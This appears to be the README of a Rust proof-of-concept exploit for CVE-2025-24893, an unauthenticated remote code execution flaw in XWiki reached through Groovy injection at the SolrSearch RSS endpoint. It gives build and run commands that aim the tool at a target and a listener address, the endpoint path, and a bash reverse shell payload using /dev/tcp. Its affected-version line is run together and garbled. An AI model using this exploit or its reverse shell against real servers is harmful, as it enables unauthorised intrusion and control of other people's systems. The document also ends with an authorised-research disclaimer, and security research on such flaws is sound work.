
Proof-of-Concept exploit for CVE-2025-24893, an unauthenticated Remote Code Execution (RCE) vulnerability in XWiki. Exploits a template injection flaw in the SolrSearch endpoint via Groovy script execution.
Proof-of-Concept exploit for CVE-2025-24893, a critical unauthenticated Remote Code Execution vulnerability in XWiki.
This exploit abuses a Groovy template injection in the SolrSearch endpoint to execute arbitrary commands — including reverse shells — without authentication.
A flaw in how XWiki handles crafted input to the SolrSearch RSS endpoint allows attackers to inject Groovy code into the rendering pipeline.
This enables unauthenticated RCE via {{groovy}} script blocks.
< 15.10.11>= 16.0.0 and < 16.4.115.10.1116.4.1Download the release:
or build from source:
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
There's a prebuilt reverse shell payload in this form:
bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1
This code is for educational and authorized security research only. Do not use this exploit against systems you do not own or have explicit permission to test.
/bin/get/Main/SolrSearch?media=rss